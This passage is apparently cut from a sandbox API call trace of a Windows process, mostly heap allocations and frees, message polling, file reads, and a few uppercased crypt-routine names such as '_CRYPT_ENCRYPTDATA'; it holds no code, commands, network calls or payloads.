Size=0x10) returned 0x2e504a0 [0145.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0145.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0145.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3dee020 [0145.803] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0145.803] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0145.806] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0x3c4e, lpOverlapped=0x0) returned 1 [0145.807] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0145.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0145.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0145.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0145.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0145.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c4e) returned 0x2f04008 [0145.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3dee020 | out: hHeap=0x970000) returned 1 [0145.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0145.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0145.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0145.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0145.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0145.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0145.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0145.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0145.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c4e) returned 0x2f17c60 [0145.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0145.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0145.940] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0145.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0145.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0145.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0145.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0145.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c4e) returned 0x2f04008 [0145.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0145.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0145.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0145.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0145.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0145.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0145.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0145.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0145.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0145.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0145.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0145.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0145.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0145.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0145.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0145.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0145.951] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0145.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0145.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0145.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0145.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0145.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0145.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0145.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0145.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c4e) returned 0x2f04008 [0145.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0145.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0145.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0145.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0145.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0145.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0145.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0145.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0145.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0145.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0145.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0145.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0145.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0145.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0145.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0145.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0145.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0145.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0145.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0145.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c4e) returned 0x2f2b8b8 [0145.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0145.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0145.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0145.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0145.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0145.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0145.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0145.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0145.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0145.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0145.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0145.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0145.964] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0145.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0145.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0145.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0145.964] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0145.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0145.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0145.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0145.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0145.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0145.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0145.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0145.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0145.965] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0145.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0145.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0145.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0145.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0145.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0145.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0145.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0145.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0145.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0145.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0145.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0145.965] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0145.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0145.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0145.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0145.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0145.966] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0145.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0145.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0145.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0145.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0145.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0145.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0145.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0145.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0145.967] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0145.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0145.967] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0145.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0145.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0145.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0145.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0145.967] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0145.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0145.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0145.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0145.967] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0145.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0145.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0145.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0145.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0145.968] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0145.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0145.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0145.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0145.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0145.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0145.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0145.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0145.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0145.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0145.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0145.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0145.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0145.968] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0145.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0145.968] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0145.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0145.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0145.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0145.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0145.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0145.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0145.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0145.969] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0145.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0145.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0145.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0145.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0145.969] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0145.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0145.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0145.969] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0145.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0145.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0145.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0145.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0145.969] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0145.969] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0145.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0145.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0145.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0145.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0145.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0145.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0145.970] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0145.970] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0145.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 